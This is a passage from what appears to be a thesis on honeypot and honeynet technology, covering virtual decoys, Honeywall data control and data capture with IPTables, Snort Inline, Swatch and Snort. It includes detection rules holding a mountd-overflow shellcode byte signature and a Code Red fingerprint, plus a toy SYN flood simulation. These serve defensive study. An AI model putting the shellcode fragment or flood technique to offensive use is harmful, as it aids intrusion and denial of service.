There exist two basic deployment options for electronic baits (cmp. Provos and Holz, 2007): A physical honeypot runs on a dedicated machine with its own IP address on the network. As a result, the decoy closely mimics the characteristics and behavior of a real computer system. Thus, attackers may fully interact with the host and gain complete control of the system platform. On the other hand, physical honeypots are “typically expensive to install and maintain” (see Provos and Holz, 2007, p. 11). Furthermore, the solution scales poorly, because different components and devices must be acquired for each machine. Consequently, hardware costs quickly skyrocket when multiple electronic baits must be set up. With respect to this case, an alternative and more reasonable approach is deploying several virtual honeypots on a single system. A virtual honeypot is built on top of a virtual machine, i.e., an isolated, secure, and reliable computing environment (see Creasy, 1981). It shares all its resources with the underlying host system and possibly other guest systems that are executed in parallel on the computer. A sample illustration of a virtual honeypot setup is presented in Figure 2.3(a).
In the given example, two guest systems with the private IP addresses 192.168.1.1 and 192.168.1.2 are installed on a host that is directly connected to the Internet. In order to prevent collisions between the guest systems, a special software layer, the virtual machine monitor (VMM), simulates replicas of the physical components. Thereby, each machine appears to have its own CPU (Central Processing Unit), memory, graphics adapter, network interface, and I/O (Input/Output) interface (see Figure 2.3(b) and Parmelee et al., 1972; Goldberg, 1974). As a consequence, security professionals can maintain various decoys with different operating systems as well as applications on one computer, while keeping hardware costs down at the same time. In comparison to their physical counterparts, virtual honeypots also have a number of additional benefits (cmp. Provos and Holz, 2007): First, the electronic baits are easier to maintain, because they are stored as plain files on the underlying host system. Thus, they can be copied, shared, and distributed without difficulty. This technique also permits taking snapshots of a running system and saving its current state. Thus, it is possible to quickly restore the configuration of a decoy after it has been compromised.

Figure 2.3: (a) Setup and (b) Architecture of a Virtual Honeypot (Source: Provos and Holz, 2007; VMWare, 2006)

Regarding the implementation of the virtual environment, two software products are primarily referenced in the literature (see also Honeynet Project, 2004b): The open source application User-mode Linux⁶ (UML) by Jeff Dike is a port of the Linux kernel to the Linux system call interface (see Dike, 2006; Honeynet Project, 2002a). It creates an executable binary of the core libraries. As a result, the kernel can be started as a normal process in user space and boot a second, Linux-based operating system.
System calls that are sent to the UML instance are then transparently passed to the host and are processed by the underlying machine. This behavior is illustrated in Figure 2.4. Even though the approach helps create a guest system on the target platform, the UML instance can be fingerprinted quite easily as demonstrated by Provos and Holz (2007). Therefore, the authors strongly discourage using the application for honeypots in practice.

⁶ http://user-mode-linux.sourceforge.net/

Figure 2.4: Architecture of User-Mode Linux (Source: Based on Dike, 2006)

A more advanced technology is provided by the virtualization software solutions that are offered by VMWare⁷. In the scope of this thesis, we focus on the free VMWare Server⁸. The application provides a comfortable graphical user interface for administrative tasks and even permits configuring virtual machines remotely over the Internet. In contrast to UML, the product supports both Linux and Microsoft Windows operating systems as well as other platforms such as Sun Solaris and Novell NetWare. It is highly scalable and emulates complete x86-based computer systems. Due to these characteristics, multiple, concurrently running virtual electronic decoys can be deployed. What is more, with the help of a virtual bridge that is set up during the installation process of the software, each honeypot is assigned its own IP address and, thus, may act as an entirely separate machine on the network (see Provos and Holz, 2007, p. 27). A high-level overview of this architecture is shown in Figure 2.5. In spite of these features, sophisticated adversaries are potentially able to detect the virtual environment, e.g., by recognizing subtle differences in the hardware layer of a machine (see Holz and Raynal, 2005a,b). In this case, the presence of a honeypot is possibly revealed, and the device is likely to be evaded in the future as we have already explained. As Provos and Holz (2007, p.
22) conclude, the approach may thus “lead to less information about attackers”.

⁷ http://www.vmware.com/
⁸ http://www.vmware.com/products/server/

Figure 2.5: Illustration of the Bridged Networking Functionality in VMWare (Source: Based on Provos and Holz, 2007)

2.6 Summary

In this chapter, we have presented the methodological and technical concepts of honeypots. Honeypots are computer systems which are intentionally designed insecurely. They act as electronic baits and enable security professionals to learn more about the tools, tactics, and motives of adversaries. When they are deployed within a production environment, they can help detect penetration attempts at the network perimeter and protect the resources of an organization against Internet threats. Because all interactions with a decoy are malicious by definition, captured data sets are quite small. Moreover, in comparison to traditional monitoring stations such as intrusion detection systems, the number of encountered false positives is significantly lower. Depending on the level of involvement and risk, we have distinguished two types of electronic baits: A high-interaction honeypot offers attackers a real operating system to interact with. In contrast, a low-interaction honeypot only emulates specific system services. Neither of these solutions is superior to the other. Rather, both approaches have their own advantages and disadvantages, as indicated in Table 2.1 (see also Honeynet Project, 2004b; Provos and Holz, 2007). For this reason, the individual characteristics of the technologies must be carefully judged, particularly with regard to the organizational objectives (cmp. Spitzner, 2001b, 2002). We have also differentiated between physical and virtual honeypots: A physical honeypot runs on a dedicated machine with its own IP address and closely mimics the behavior of a real computer system.
On the other hand, a virtual honeypot is executed within a separate and secure computing environment. Since system resources are shared between the individual guest systems, it is possible to deploy multiple decoys on a single host. Thereby, hardware costs and maintenance efforts can be effectively reduced.

| Low-Interaction Honeypots | High-Interaction Honeypots |
|---|---|
| easy installation, configuration, and deployment | increased complexity, harder to install and to maintain |
| limited information capturing capabilities, e.g., authentication credentials entered by the adversary | extensive information capturing capabilities |
| possibility to generate statistics at a higher level of abstraction | possibility to analyze intrusions in detail, including tools, communications, and keystrokes of adversaries |
| minimal risk, because solely emulated services are exposed to attacks | higher risk as attackers are offered complete operating systems and fully working services to interact with |

Table 2.1: Advantages and Disadvantages of Low-Interaction and High-Interaction Honeypots

We have given an overview of two software products that are capable of setting up a virtual environment: User-mode Linux patches the system core in order to execute numerous instances of a Linux-based operating system on top of the host kernel. The virtualization software VMWare emulates complete x86-based computer systems and supports a variety of different operating systems. In the scope of this thesis, we focus on the freely available VMWare Server. It offers a comfortable user interface that makes the administration of our virtual honeypots significantly easier. It is important to note though that the value of electronic baits can be highly increased when they are linked in a so-called honeynet. We will have a closer look at this technology in the next chapter.

3 Honeynet Technology

In the previous chapter, we have illustrated the concept and value of honeypots.
Individually deployed electronic baits share a common problem though: As stand-alone systems, they have a narrow field of view, i.e., they do not capture malicious activities unless they are attacked directly (see Spitzner, 2002, 2003a). Therefore, a more meaningful approach is building a so-called honeynet and learning about security-related incidents on a network-wide scope. It is then possible to link data accumulated from different machines, e.g., to create a more accurate profile of adversaries after an intrusion. A honeynet is a group of honeypots that are set up and interconnected behind a special gateway with monitoring and filtering capabilities (cmp. Honeynet Project, 2004b; Curran et al., 2005). As such, a separated, highly controlled environment can be created as indicated in Figure 3.1. Similar to a honeypot, the purpose of a honeynet lies in being probed, attacked, and compromised (see Honeynet Project, 2006). However, in comparison to a single system, information collected about threats is more expressive and, hence, more valuable as we have already noted above. On the other hand, the level of complexity is significantly higher. That is why certain guidelines have been proposed in order to safely deploy a honeynet. According to the Honeynet Project (2004a), the most important aspect that needs to be considered is data control. Data control is defined as the “containment of activity” (Honeynet Project, 2004b, p. 37), i.e., attackers must be prevented from affecting non-honeynet systems (see Honeynet Project, 2005e). This requirement often turns out to be difficult to realize in practice, because organizations need to find a tradeoff between freedom and risk (cmp. Honeynet Project, 2004b): If adversaries are granted a higher degree of freedom, their behavior can be studied in detail, but the level of risk rises in parallel as well.
Therefore, to mitigate threats as best as possible, several best practices have proven helpful: First, at least two different data control mechanisms and layers should be used to avoid a single point of failure. Second, implementations should permit manual intervention. Third, the system should completely block access to the honeynet in case all layers collapse. A second major element that must be taken into consideration when building a honeynet is data capture. This refers to the “monitoring and logging of all the blackhat’s activities” (Honeynet Project, 2004b, p. 39). As with data control, it is suggested to implement multiple layers in order to observe adversaries as closely as possible. With regard to the third factor, data analysis, it is crucial to store log files and other records created during incidents outside the honeynet in a secure location to ensure the integrity of the captured data. Administrators are also advised to maintain standardized reports of each compromise. This approach facilitates a later classification of the observed intrusions and helps learn the tools, tactics, and motives of attackers (cmp. Honeynet Project, 2006).

Figure 3.1: Overview of the Honeynet Architecture (Source: Based on Honeynet Project, 2006)

Outline of the Chapter

As we will see, the technical implementation of the individual guidelines and requirements as described has changed significantly throughout the years (see also Honeynet Project, 2005d). Therefore, we first give a brief overview of historical honeynet architectures in Section 3.1. The current technologies and tools in use are the subject of Sections 3.2 and 3.3. In Section 3.4, we illustrate the deployment process of a virtual honeynet and outline the setup of a future solution, so-called distributed honeynets. We conclude with a summary of the different concepts and methodologies in Section 3.5.
3.1 Historical Implementations of Honeynets

A preliminary version of a honeynet was already deployed in 1987 by the system manager Cliff Stoll (see Stoll, 2005). While working at the Lawrence Berkeley Lab, Stoll detected penetration attempts on multiple computer systems. He decided to watch the intruder over a period of several months and used rudimentary data capture and data control mechanisms. For instance, he created various interesting-sounding files that served as electronic decoys. Thereby, Stoll hoped to distract the attacker from other vulnerable network segments, while learning as much as possible about his intentions and motives at the same time. With the collected information, he was finally able to track down the adversary and uncover a severe case of industrial espionage. The first organizational honeynet solution was developed in 1999 by members of the Honeynet Project Research Alliance (see Honeynet Project, 2004b). The central element of the so-called GenI honeynet was formed by a conventional firewall. When a decoy was compromised, all outgoing network connections were blocked after a predefined limit had been reached. With the help of this simple data control mechanism, the external environment could be protected against automated scans and other types of malicious activities (see Spitzner, 2003b). On the other hand, data capture requirements were met by installing an intrusion detection system that recorded all inbound as well as outbound traffic flows. In case an alert was recognized, the device sent a notification message to a remote log server. Thereby, captured data sets could be effectively guarded against deletion and manipulation. The interaction between the different components is illustrated in Figure 3.2. With first generation honeynets, security professionals were able to study the behavior of autonomously propagating malware and low-skilled adversaries.
In spite of these capabilities, the architecture suffered from several drawbacks (cmp. Honeynet Project, 2004b): First, network operations were entirely based on the TCP/IP network layer of the OSI (Open Systems Interconnection) reference model (see Stevens, 1994; Comer, 2000, for a complete description of the different network layers). As a result, all devices, including the firewall, the intrusion detection system, and the log server, were assigned their own IP addresses and were publicly accessible over the Internet. As participants of the Honeynet Project (2004b, p. 96) explain, “this reveal(ed) their existence to the probing blackhat, so the risk of becoming possible targets (was) high”. Second, as numerous software applications had to be installed and maintained, the deployment of a GenI honeynet was time-consuming and error-prone. Furthermore, stealthily capturing keystrokes as well as analyzing encrypted sessions was exceedingly complex (cmp. Spitzner, 2002), even though various tools helped facilitate this process (see Antonomasia, 2003; Floydman, 2002). In order to cope with these issues, the system setting was completely redesigned in 2001 and led to the development of new and advanced variants, so-called GenII and GenIII honeynets. We will present their functionality in the following sections.

Figure 3.2: Architecture of a GenI Honeynet (Source: Based on Honeynet Project, 2004b)

3.2 GenII Honeynets

In comparison to first generation honeynets, GenII honeynets are more powerful and more efficient with regard to their observation capabilities, their detectability, and their ease of maintenance (cmp. Honeynet Project, 2004b). These key benefits result from two major architectural characteristics: First, the honeynet gateway is implemented as a transparent bridge (see Honeynet Project, 2005e). A bridge connects separated networks and operates as a data link on the second layer of the OSI reference model (cmp. Perlman, 1999).
Data packets sent over this layer are known as frames and carry 48-bit numbers, the so-called Media Access Control (MAC) addresses, that identify their sender and their receiver. When a frame arrives at a bridge, its destination MAC address is extracted and looked up in an internal system table to identify its physical destination. If a matching entry is found, the frame is forwarded to its designated location. Otherwise, it is broadcast to every network except the one it was received on (see Tanenbaum, 2003). It is important to note that these operations have no effect on protocols working on higher network layers, e.g., IP. As a consequence, a number of popular reconnaissance attacks are rendered useless (cmp. Honeynet Project, 2004b). For instance, adversaries often execute a traceroute command to monitor the TTL (Time to Live) field in the header of an IP packet en route to a target. Because each intermediary machine decrements the TTL value by one (see Postel, 1981b), the presence of firewalls and IDSs can be easily discovered. On the other hand, when an IP packet passes through a bridge, its TTL field is not modified. Therefore, an instance of the honeynet gateway is hard to detect. Moreover, compromising the device directly is difficult as well, because the bridging network interfaces do not have their own IP addresses (cmp. Honeynet Project, 2004b). However, it is still possible to administer the gateway system over a remote connection as indicated by the dotted line in Figure 3.3. For this purpose, a third network interface card (NIC) is required.

Figure 3.3: Architecture of a GenII Honeynet

The second difference to GenI honeynets concerns the implementation of data control and data capture measures. Instead of deploying the required tools on separate machines, all applications are installed on the gateway system. Thus, malicious activities may effectively be blocked at a central point whenever it is desired.
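The forwarding behavior of a bridge and its effect on the TTL field can be sketched as follows. The class TransparentBridge, the port names, and the MAC addresses are hypothetical. The step that records the sender's address in the table is the usual behavior of a learning bridge and is an assumption of this sketch, as the text above only describes the lookup.

```python
from typing import Dict, List, Set


class TransparentBridge:
    """Forwards frames by destination MAC address and never touches the IP header."""

    def __init__(self, ports: Set[str]) -> None:
        self.ports = set(ports)
        self.mac_table: Dict[str, str] = {}   # MAC address -> port it was last seen on

    def forward(self, in_port: str, src_mac: str, dst_mac: str) -> List[str]:
        """Return the ports on which the frame is sent out."""
        self.mac_table[src_mac] = in_port     # assumption: learn the sender's location
        out_port = self.mac_table.get(dst_mac)
        if out_port is None:
            # Unknown destination: send to every port except the incoming one.
            return sorted(self.ports - {in_port})
        if out_port == in_port:
            return []                         # destination is on the same segment
        return [out_port]


def ttl_after_hop(ttl: int, device: str) -> int:
    """A router decrements the TTL of an IP packet; a bridge leaves it unchanged."""
    return ttl - 1 if device == "router" else ttl


bridge = TransparentBridge({"p1", "p2", "p3"})
first = bridge.forward("p1", "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02")
reply = bridge.forward("p2", "bb:bb:bb:bb:bb:02", "aa:aa:aa:aa:aa:01")
```

In this run, the first frame is sent to both other ports because its destination is still unknown, whereas the reply is delivered to a single port. The helper ttl_after_hop shows why a traceroute does not reveal the bridge: the TTL value leaves the device exactly as it arrived.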
Because all data control and data capture functions are concentrated on it, the honeynet gateway is also often referred to as the Honeywall. We will cover the individual components of the Honeywall according to their function in the following.

3.2.1 Data Control Implementations

GenII honeynets use a combination of filtering and intrusion detection mechanisms to control inbound and outbound network traffic. The tools used on the Honeywall are netfilter, IPTables, and Snort Inline.

• Netfilter and IPTables

Network packets can be intercepted and manipulated on the honeynet gateway with the netfilter software¹. Netfilter operates on the kernel level and provides sophisticated routing and filtering capabilities that are required to implement a fully functional network firewall (cmp. Russell, 2002). Whenever a packet is about to enter or leave the honeynet, it is processed on the Honeywall and compared against a set of internal rules. Based on these rules, pre-defined actions can be taken. For instance, the packet may get accepted and be forwarded to the target machine, as it is indicated in Figure 3.4. Alternatively, it may also be rejected, e.g., to protect specific network segments and mitigate risks for uninvolved third parties as best as possible. A short description of the individual actions can be found in Table 3.1.

¹ see http://www.netfilter.org/

Figure 3.4: Network Filtering Capabilities of the Honeynet Gateway

Netfilter rules can be manipulated in user space with the help of the IPTables² interface that was developed by Rusty Russell.
For instance, to define a firewall exception for the honeypot with the IP address 192.168.1.2, we invoke the application with the -A parameter as follows:

    iptables -A INPUT -p tcp --dport 22 -d 192.168.1.2 -j ACCEPT

In the given example, we add a new rule to the packet filter in order to accept (-j parameter) inbound (INPUT chain), TCP-based traffic flows (-p parameter), targeting the secure shell server on port 22 (--dport parameter) of the decoy (-d parameter). A complete overview of the myriad of IPTables commands and parameters is given by Russell (2002).

[2] see http://www.netfilter.org/projects/iptables/index.html

Action    Description
ACCEPT    The packet is free to continue its path.
DROP      The packet is silently discarded without sending an error message to the originator.
LOG       The packet is logged with a user-defined informational text.
REJECT    The packet is rejected, and an error message is sent to the originator.
QUEUE     The packet is placed on the queue and may be accessed by a user space process.

Table 3.1: List of Possible netfilter Actions (Source: Based on Honeynet Project, 2004b, p. 103)

State          Description
NEW            The packet initiates a fresh connection.
ESTABLISHED    The packet belongs to an existing connection that transfers data in both directions.
RELATED        The packet is related to an existing connection, for example an FTP session.
INVALID        The packet could not be processed correctly and should generally be dropped.

Table 3.2: List of Connection States as Distinguished by IPTables (Source: Honeynet Project, 2004b; Russell, 2002)

In addition to the firewall rules, two components of IPTables are particularly relevant for implementing efficient data control mechanisms on the Honeywall: With the help of the state module, we are able to define fine-grained filter rules based on the connection state a packet is in (see Table 3.2). As a result, we can efficiently keep track of different network sessions.
With the second, limit module, it is possible to restrict the maximum number of packets that are processed within a given time interval: After the specified limit has been reached, further packets are automatically discarded. The two components operate collaboratively on the gateway system. This functionality is called Connection Rate Limiting Mode (CRLM) and is particularly useful for preventing Denial of Service (DoS) attacks that are launched from compromised honeypots. In the course of a DoS attack, the resources of a system are exhausted. As a consequence, services may not be accessed by legitimate users any longer (cmp. Moore et al., 2006).

A well-known example of this type of incident is a SYN Flood (see CERT, 1996). The attack exploits an idiosyncrasy in the architecture of the TCP protocol: TCP connections must be established with a so-called handshake (see Postel, 1981c; Stevens, 1994). The client initiates the communication channel by sending a synchronize (SYN) request to the server. The server acknowledges the request and returns a packet with both the SYN and ACK flags set. In turn, the client confirms the reply with a third packet to complete the handshake. This process is illustrated in Figure 3.5(a). If the last packet is not sent, however, the connection is left half-open (cmp. CERT, 1996, and Figure 3.5(b)). Thus, internal memory on the server is consumed. Consequently, if an adversary initiates a huge number of connections but does not acknowledge messages from the server, storage capacities are eventually exceeded. As a result, the performance level is degraded, and the target machine finally collapses.

Figure 3.5: Illustration of a Full (a) and a Half-Open (b) TCP Handshake
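The effect of half-open connections described above can be illustrated with a small simulation. The following Python sketch is a deliberately simplified model and not an implementation of a real TCP stack: the class name Listener, the backlog size of 128 entries, and the absence of timeouts are assumptions made purely for this example.

```python
class Listener:
    """Toy model of a server that keeps state for half-open connections."""

    def __init__(self, backlog=128):
        self.backlog = backlog      # assumed capacity for half-open entries
        self.half_open = set()      # clients that sent SYN but no final ACK
        self.established = set()

    def on_syn(self, client):
        """Handle a SYN request; return True if a SYN/ACK can be sent."""
        if len(self.half_open) >= self.backlog:
            return False            # state table is full, request is refused
        self.half_open.add(client)
        return True

    def on_ack(self, client):
        """Handle the third packet that completes the handshake."""
        if client in self.half_open:
            self.half_open.remove(client)
            self.established.add(client)
            return True
        return False


server = Listener(backlog=128)

# A legitimate client completes all three steps of the handshake.
server.on_syn("client-a")
server.on_ack("client-a")

# The attacker sends SYN requests from many spoofed sources and never replies.
for i in range(1000):
    server.on_syn(f"spoofed-{i}")

# A new legitimate client can no longer be served.
late_client_accepted = server.on_syn("client-b")
```

In this model, the table of half-open connections fills up after 128 unanswered requests, so the request of the last client is refused although the server itself is still running.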
To prevent system crashes, Bernstein (1996) has proposed the use of SYN Cookies: Rather than maintaining a large queue of half-open connections, the server calculates a specially crafted initial sequence number and thereby stores state-specific information about the connection entirely in its response packet (see also Eddy, 2007). When the client replies with the final packet, the sequence number is checked, the connection state is restored, and the handshake is completed. As a result, flooding operations do not exhaust memory resources any longer, but solely require temporary processor cycles.

A different approach to cope with DoS attacks is implemented on the Honeywall: As soon as a certain number of connections has been established, the gateway device stops forwarding packets going out of the honeynet. Thereby, outbound network traffic can be controlled, and the external environment is protected. In practice, about 20 TCP connections, 20 UDP connections, 50 ICMP connections, and 10 other, non-IP connections per hour are regarded as adequate values (see Honeynet Project, 2005a). It is important to emphasize though that these settings are not sufficient to mitigate all potential threats. As Provos and Holz (2007, p. 65) point out, “connection limiting does not help if the attacker uses a specific exploit against another host”. With respect to this scenario, we must rely on Snort Inline, a second data control mechanism of the Honeywall. We outline the functionality of this application in the following.

• Snort Inline

Snort Inline [3] operates as a network intrusion prevention system (NIPS) on the honeynet gateway and is capable of efficiently blocking attacks going out of the honeynet. It closely interacts with the IPTables packet filtering software as follows: Data streams of outbound network packets are inspected by the NIPS to assess the level of risk for the external environment.
If a potentially dangerous pattern is found, control is passed to the firewall, and the respective packet is dropped. This process is illustrated in Figure 3.6 and is known as Packet Drop Mode (PDM) (see Honeynet Project, 2004b, 2005e). It is crucial to note though that packet dropping does not affect legitimate, nonthreatening traffic flows. For example, outgoing DNS (Domain Name System) queries or NTP (Network Time Protocol) requests may safely pass the Honeywall without interference. Because of these characteristics, the presence of the gateway device can be effectively concealed from the eyes of probing blackhats (see Honeynet Project, 2004b). In addition, Snort Inline also supports a so-called Packet Replace Mode (PRM) which permits even more powerful and stealthy operations. In contrast to PDM, a suspicious packet is not completely dropped, but solely specific sections in its header or body are modified. As a result, the malicious payload can be rendered ineffective. An example of a PRM rule that mutates the exploit code of the NFS mountd buffer overflow attack is shown in Listing 3.1 (cmp. Caswell et al., 2007, p. 614). The attack targets a running NFS (Network File System) server on port 635 which is frequently used to share files over the network (see CERT, 1998). By overwriting an internal memory buffer, an adversary may spawn a remote shell and execute arbitrary code with administrative privileges. Thereby, full control of the underlying system platform may be gained. 
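The byte-level effect of such a replacement can be sketched in a few lines of Python. This is only an illustration of the idea and not the way Snort Inline is implemented: the function name replace_payload and the sample packet are hypothetical, while the two byte sequences are taken from Listing 3.1. A real inline system would additionally have to work on reassembled streams and update the packet checksums.

```python
# Byte sequences taken from the content and replace options of Listing 3.1.
SIGNATURE = bytes.fromhex("EB56 5E56 5656 31D2 8856 0B88 561E")
REPLACEMENT = bytes.fromhex("65" * len(SIGNATURE))  # same length, all 0x65


def replace_payload(payload: bytes) -> bytes:
    """Overwrite every occurrence of the signature without changing the length."""
    return payload.replace(SIGNATURE, REPLACEMENT)


# Hypothetical packet body: padding, the exploit fragment, and trailing data.
packet = b"\x90\x90" + SIGNATURE + b"/bin/sh"
sanitized = replace_payload(packet)
```

Because the replacement has exactly the same length as the signature, the size of the packet stays unchanged, which makes the modification less conspicuous than dropping the packet.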
Figure 3.6: Packet Drop Mode (PDM) of Snort Inline

[3] see http://snort-inline.sourceforge.net/

    1  alert udp $EXTERNAL_NET any -> $HOME_NET 635
    2    (msg:"EXPLOIT x86 Linux mountd overflow";
    3    content:"|EB56 5E56 5656 31D2 8856 0B88 561E|";
    4    replace:"|6565 6565 6565 6565 6565 6565 6565|";
    5    reference:cve,CVE-1999-0002;
    6    reference:bugtraq,121;
    7    classtype:attempted-admin;
    8    sid:316; rev:3;)

Listing 3.1: Sample Rule for the Packet Replace Mode (PRM) of Snort Inline

As can be seen on Line 3 of Listing 3.1, the exploit can be identified with the data sequence EB56 5E56 5656 31D2 8856 0B88 561E. If the string is observed in a packet stream, it is automatically replaced with a number of tokens, in this case, a series of simple e letters with the corresponding hexadecimal value 0x65. As a consequence, the shellcode cannot be successfully executed any longer, and the compromise attempt fails (see also Caswell et al., 2007). Writing PRM rules requires a thorough knowledge and deep understanding of the individual exploit functions (see Honeynet Project, 2004b). On the other hand, the technology facilitates observing intruders for longer periods of time: As Provos and Holz (2007, p. 65) point out, “given the difficulties of making exploits work in the wild (...), there is a high probability that intruders would not detect the presence of the Honeywall for some time and therefore continue to try different forms of attacks”.

3.2.2 Data Capture Implementations

Similar to data control implementations, security professionals rely on multiple data capture layers in order to study the behavior and intentions of adversaries. The prevalent tools and applications that are required for these tasks are presented in more detail in the following sections.

• IPTables and Swatch

We have already introduced IPTables as a powerful data control mechanism.
Due to its sophisticated routing and filtering capabilities, risks for uninvolved third parties can be mitigated. On the other hand, the software may be effectively used for data capturing activities as well: In cooperation with the syslogd daemon of the operating system, network connections can be logged to the file /var/log/messages. More importantly, with the help of Swatch, it is possible to automatically send email messages about specific events within the honeynet. Thus, administrators are able to quickly react to incidents, if this proves to be necessary.

    1  watchfor /Firewall: OUTBOUND CONNECTION/
    2    echo normal
    3    mail=admin@honeynet.org,subject=Outbound Connection
    4
    5    # limit the number of email alerts to one message per hour
    6    throttle 1:0:0

Listing 3.2: Example of a Swatch Configuration File

Swatch [4] (Simple Watcher) is a Perl-based utility that was developed by Todd Atkins for monitoring system log files in real time (see Hansen and Atkins, 1993). When a new log record is created, it is matched against certain patterns that are listed in the main configuration file of the application. A pattern can be a simple word or a more complex regular expression (see Bauer, 2001). If a match is found, a notification procedure is triggered, and an alert is mailed to a pre-defined contact person. For instance, in the sample configuration file shown in Listing 3.2, the supervisor of a honeynet is informed about outbound network connections. These types of messages must generally be taken seriously, because they potentially indicate the successful compromise of a decoy (cmp. Honeynet Project, 2004b). However, for maintenance reasons, we recommend limiting the number of generated warnings, using the throttle keyword as illustrated in Line 6 of Listing 3.2 (see also Spitzner, 2000). Thus, Swatch solely sends a summary report about logged elements in a given time interval, in our case, a period of one hour.
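The interplay of pattern matching and throttling can be sketched as follows. The Python code below is a simplified model and does not reproduce the internals of Swatch: the function name alerts_for, the format of the log records, and the use of plain second counters as timestamps are assumptions made for illustration. In particular, the sketch merely suppresses repeated alerts within the interval instead of generating a summary.

```python
import re

# Pattern and interval correspond to Listing 3.2 (throttle 1:0:0 = one hour).
PATTERN = re.compile(r"Firewall: OUTBOUND CONNECTION")
THROTTLE_SECONDS = 3600


def alerts_for(records):
    """Yield (timestamp, line) for every record that would trigger a mail."""
    last_alert = None
    for timestamp, line in records:
        if not PATTERN.search(line):
            continue                      # record does not match the pattern
        if last_alert is not None and timestamp - last_alert < THROTTLE_SECONDS:
            continue                      # suppressed by the throttle interval
        last_alert = timestamp
        yield timestamp, line


# Hypothetical log records: (seconds since start, message text).
log = [
    (0, "Firewall: OUTBOUND CONNECTION SRC=192.168.1.2 DPT=6667"),
    (120, "Firewall: OUTBOUND CONNECTION SRC=192.168.1.2 DPT=6667"),
    (900, "sshd: session opened"),
    (4000, "Firewall: OUTBOUND CONNECTION SRC=192.168.1.2 DPT=80"),
]
sent = list(alerts_for(log))
```

Of the three matching records, only the first and the last one lead to a notification, because the second one falls into the one-hour interval that is started by the first alert.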
According to our experience, an interval of one hour is acceptable for responding to security-related occurrences within the honeynet in time.

• Snort

The open source network intrusion detection system (NIDS) Snort [5] forms the second data capturing layer on the Honeywall. It supports two different runtime modes: In packet sniffing and logging mode, Snort records all traffic flows that are about to enter or leave the honeynet. Data streams are saved as raw binary files. Thereby, the data capture process is significantly accelerated, because network packets are not converted into a human-readable format first (see Caswell et al., 2007). In addition, the generated files can be directly imported into network analysis and forensic applications such as Tcpdump [6] or Wireshark [7]. As we will see in Chapter 5, these applications are very powerful and greatly facilitate the investigation of an incident. For example, it is possible to restore an FTP session that was initiated in the course of a system compromise and recover the steps of the intruder.

[4] see http://swatch.sourceforge.net/
[5] see http://www.snort.org/
[6] see www.tcpdump.org/
[7] see www.wireshark.org/

     1  # rule header
     2  alert tcp $EXTERNAL_NET any -> $INTERNAL_NET 80
     3
     4  # rule options
     5  (msg:"WEB-IIS CodeRed v2 root.exe access";
     6  flow:to_server,established;
     7  uricontent:"/root.exe"; nocase;
     8  reference:url,www.cert.org/advisories/CA-2001-19.html;
     9  classtype:web-application-attack;
    10  sid:1256; rev:8;)

Listing 3.3: Sample Rule of the Snort Intrusion Detection System

When running in intrusion detection mode, Snort inspects each packet based on a list of attack-specific detection rules in order to discover potentially dangerous operations. A detection rule consists of a header and corresponding rule options.
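The two parts of a rule can be made visible by splitting the rule text of Listing 3.3 programmatically. The following Python sketch is a naive illustration and not the parser used by Snort: the function name split_rule and the field names of the header are chosen freely for this example, and the code assumes that neither parentheses nor semicolons occur inside quoted option values.

```python
RULE = (
    'alert tcp $EXTERNAL_NET any -> $INTERNAL_NET 80 '
    '(msg:"WEB-IIS CodeRed v2 root.exe access"; '
    'flow:to_server,established; uricontent:"/root.exe"; nocase; '
    'reference:url,www.cert.org/advisories/CA-2001-19.html; '
    'classtype:web-application-attack; sid:1256; rev:8;)'
)

# Field names are labels chosen for this sketch only.
HEADER_FIELDS = ["action", "protocol", "src", "src_port",
                 "direction", "dst", "dst_port"]


def split_rule(rule):
    """Split a rule into a header dictionary and a list of (key, value) options."""
    header_text, _, option_text = rule.partition("(")
    header = dict(zip(HEADER_FIELDS, header_text.split()))
    options = []
    for item in option_text.rstrip(")").split(";"):
        item = item.strip()
        if item:
            key, _, value = item.partition(":")
            options.append((key, value.strip('"')))
    return header, options


header, options = split_rule(RULE)
```

The options are kept as a list of pairs rather than a dictionary, because keywords such as reference may appear more than once within a single rule.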
The header defines the action that is taken in case a threat is discovered, the transport protocol used by the packet, as well as basic IP and port matching criteria. The rule option section contains processing-related instructions and metadata information, e.g., references to relevant security advisories (cmp. Caswell et al., 2007). A complete overview of the individual rule components is given by Sourcefire (2009). An example of a Snort rule is shown in Listing 3.3 (cmp. Caswell et al., 2007, p. 302). It affects TCP-specific traffic flows that enter the honeynet on an arbitrary port and are destined for web servers running on port 80. As can be seen on Line 7, suspicious packets are identified by the string /root.exe, a fingerprint of the Code Red worm. The worm caused severe havoc in 2001 and is still propagating in the wild at the time of this writing (cmp. CERT, 2001a,b, and Chapter 5). If the string pattern is detected, an alert message is generated on the Honeywall (cmp. the alert action in the rule header of Listing 3.3), and the incident is logged. However, it is important to note that worm attacks and particularly new types of malicious activities can only be properly recognized if the Snort rule set is carefully kept up to date at all times. With the help of Oinkmaster [8], which is part of the Honeywall, this process can be significantly facilitated. Oinkmaster automatically downloads the latest signatures from a pre-defined rule repository (see Östling, 2006). It is capable of importing both the official, high-quality definitions that are commercially distributed by the Vulnerability Research Team (VRT) [9] as well as slightly reduced versions that are provided free of charge by members of the Snort community [10]. A severe downside of intrusion detection systems is their inability to cope with encrypted network traffic (cmp. Honeynet Project, 2004b).
Consequently, if adversaries establish connections over secure protocols such as TLS (Transport Layer Security) or SSL (Secure Sockets Layer), penetration attempts cannot be reliably monitored any longer. In order to solve this problem, a third data capture layer needs to be implemented. A description of this layer is the subject of the next section.

[8] see http://oinkmaster.sourceforge.net/
[9] see http://www.snort.org/vrt/buy-a-subscription
[10] see http://www.snort.org/snort-rules

• Sebek

As participants of the Honeynet Project (2004b) explain, intruders frequently use encryption techniques to protect their communication channels from network surveillance devices. Common cryptographic algorithms such as AES (Advanced Encryption Standard, see NIST, 2001) or 3DES (Triple Data Encryption Standard, see NIST, 1999) are extremely difficult to break, even though a number of attack strategies have been developed more recently (see Bernstein, 2005; Osvik et al., 2006; Lucks, 1998). In spite of these efforts, the algorithms are considered to be secure at the time of this writing. Thus, to effectively observe the behavior of adversaries, security professionals must circumvent the respective encryption routines. The open source utility Sebek [11] makes these types of operations comparatively easy by intercepting network packets after they have passed the decryption engine of the operating system (see Honeynet Project, 2003c). It is available free of charge for different system platforms, including Linux, Microsoft Windows, OpenBSD, and Solaris. In the scope of this thesis, we focus on the Linux-based version of the software, although the concepts outlined below can also be applied to most other versions.

With respect to its system architecture, Sebek consists of a client and a server component. The client must be installed on each decoy within the honeynet. In contrast, the server runs within a central location on the Honeywall.
